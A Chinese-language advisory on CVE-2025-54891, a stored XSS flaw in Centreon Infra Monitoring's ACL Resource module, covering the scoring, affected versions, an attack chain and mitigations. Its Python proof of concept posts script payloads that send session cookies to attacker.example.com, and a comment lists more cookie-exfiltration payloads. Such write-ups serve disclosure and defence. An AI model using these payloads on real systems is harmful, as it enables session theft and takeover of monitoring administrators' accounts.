CVE-2025-54891 Centreon Infra Monitoring 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-54891

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring（ACL Resource访问配置模块）

漏洞概述

CVE-2025-54891是Centreon Infra Monitoring产品中发现的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于ACL Resource访问配置模块中，由于在Web页面生成过程中未对用户输入进行充分的中和处理（Improper Neutralization of Input During Web Page Generation），导致具有提升权限的用户能够在系统中注入恶意的JavaScript脚本代码。这些恶意代码将被持久化存储在服务器端，当其他用户（包括管理员）访问受影响的页面时，恶意脚本将在其浏览器中自动执行。

根据CVSS 3.1评分体系，该漏洞的评分为6.8分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）才能利用，无需用户交互（UI:N）。漏洞的影响范围已发生改变（S:C），机密性影响为高（C:H），完整性和可用性影响为无。

该漏洞影响Centreon Infra Monitoring的多个版本，包括24.10.0至24.10.13之前、24.04.0至24.04.18之前以及23.10.0至23.10.28之前的版本。Centreon作为一款广泛使用的IT基础设施监控解决方案，其安全漏洞可能对企业的网络监控和管理造成严重影响。该漏洞已于2025年10月14日正式披露，官方已发布相应的安全补丁进行修复。

技术细节

该漏洞属于典型的存储型XSS（Stored Cross-Site Scripting）漏洞，其根本原因在于Centreon Infra Monitoring的ACL Resource访问配置模块未对用户提交的输入数据进行充分的过滤和转义处理。

漏洞原理：
1. 在ACL Resource访问配置模块中，系统允许具有提升权限的用户配置资源访问控制列表（ACL），包括资源名称、描述等字段。
2. 攻击者在配置这些字段时，可以插入恶意的JavaScript代码或HTML标签，例如`<script>alert(document.cookie)</script>`或`<img src=x onerror=...>`等。
3. 由于服务器端未对这些输入进行适当的HTML实体编码或过滤，恶意代码被直接存储到数据库中。
4. 当其他用户（尤其是管理员）查看ACL Resource配置页面时，服务器从数据库中读取这些未转义的数据并直接嵌入到返回的HTML页面中。
5. 浏览器解析该HTML时，将执行嵌入的恶意JavaScript代码。

利用方式：
- 攻击者需要具有提升权限的账户（PR:H），这通常意味着需要先获取低权限账户或通过社会工程学获取合法凭证。
- 登录后，导航至ACL Resource配置页面，在资源名称或描述等字段中注入恶意脚本。
- 等待管理员或其他高权限用户访问该配置页面，恶意脚本将在受害者浏览器中执行。
- 攻击者可利用此漏洞窃取会话Cookie、进行权限提升、发起钓鱼攻击或执行其他恶意操作。

由于CVSS向量中标记为S:C（Scope Changed），这意味着漏洞的影响范围超出了受影响的组件，攻击者可能通过XSS进一步影响系统的其他部分或用户数据。

攻击链分析

STEP 1

步骤1：获取初始访问权限

攻击者首先需要获取具有提升权限的Centreon账户凭证。这可以通过钓鱼攻击、密码爆破、凭证填充或利用其他漏洞实现。

STEP 2

步骤2：登录系统

使用获取的凭证登录Centreon Infra Monitoring管理界面，确保账户具有ACL Resource配置模块的访问权限。

STEP 3

步骤3：注入恶意脚本

导航至ACL Resource访问配置模块，在资源名称、描述或其他可编辑字段中注入精心构造的恶意JavaScript代码或HTML标签。

STEP 4

步骤4：等待触发

恶意脚本被持久化存储在数据库中，等待管理员或其他高权限用户访问受影响的ACL Resource配置页面。

STEP 5

步骤5：脚本执行与数据窃取

当受害者查看包含恶意代码的配置页面时，浏览器执行嵌入的JavaScript，窃取会话Cookie、敏感信息或执行进一步的攻击操作。

STEP 6

步骤6：权限提升与横向移动

利用窃取的管理员会话，攻击者可以执行任意管理操作，包括修改监控配置、访问敏感数据或进一步渗透网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54891 - Centreon Infra Monitoring Stored XSS PoC
# Vulnerability: Stored XSS in ACL Resource access configuration modules
# Affected: Centreon Infra Monitoring 24.10.0 before 24.10.13, 24.04.0 before 24.04.18, 23.10.0 before 23.10.28

import requests

TARGET_URL = "https://target-centreon.example.com"
USERNAME = "elevated_user"
PASSWORD = "password123"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_payload = {
    "useralias": USERNAME,
    "password": PASSWORD,
    "submitLogin": "Connect"
}
session.post(f"{TARGET_URL}/centreon/api/latest/login", data=login_payload)

# Step 2: Inject malicious XSS payload into ACL Resource configuration
# The payload will be stored in the database and executed when other users view the configuration
xss_payload = {
    "resource_name": "<script>alert('XSS-CVE-2025-54891');document.location='https://attacker.example.com/steal?cookie='+document.cookie;</script>",
    "resource_alias": "test_resource",
    "comment": "<img src=x onerror=fetch('https://attacker.example.com/steal?data='+btoa(document.cookie))>",
    "activate": "1"
}

# Step 3: Submit the malicious configuration to the ACL Resource endpoint
response = session.post(
    f"{TARGET_URL}/centreon/main.php?p=60103",
    data=xss_payload
)

if response.status_code == 200:
    print("[+] XSS payload successfully stored in ACL Resource configuration")
    print("[+] When an admin views this resource, the script will execute")
else:
    print(f"[-] Failed to inject payload. Status code: {response.status_code}")

# Alternative payload examples for manual testing:
# 1. Simple alert: <script>alert('XSS')</script>
# 2. Cookie theft: <script>new Image().src='https://attacker.com/c?'+document.cookie</script>
# 3. Event-based: <svg onload=alert(1)>
# 4. Data exfiltration: <script>fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify({c:document.cookie})})</script>

影响范围

Centreon Infra Monitoring >= 24.10.0, < 24.10.13

Centreon Infra Monitoring >= 24.04.0, < 24.04.18

Centreon Infra Monitoring >= 23.10.0, < 23.10.28

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制ACL Resource配置模块的访问权限，仅授予必要的管理员；2）对用户输入进行严格的输入验证，拒绝包含特殊字符（如<、>、"、'等）的输入；3）部署Web应用防火墙（WAF），配置XSS防护规则；4）启用Content Security Policy，限制内联脚本执行；5）监控异常的用户输入和访问行为，及时发现潜在的注入攻击；6）定期轮换管理员密码和会话令牌，降低凭证泄露的风险。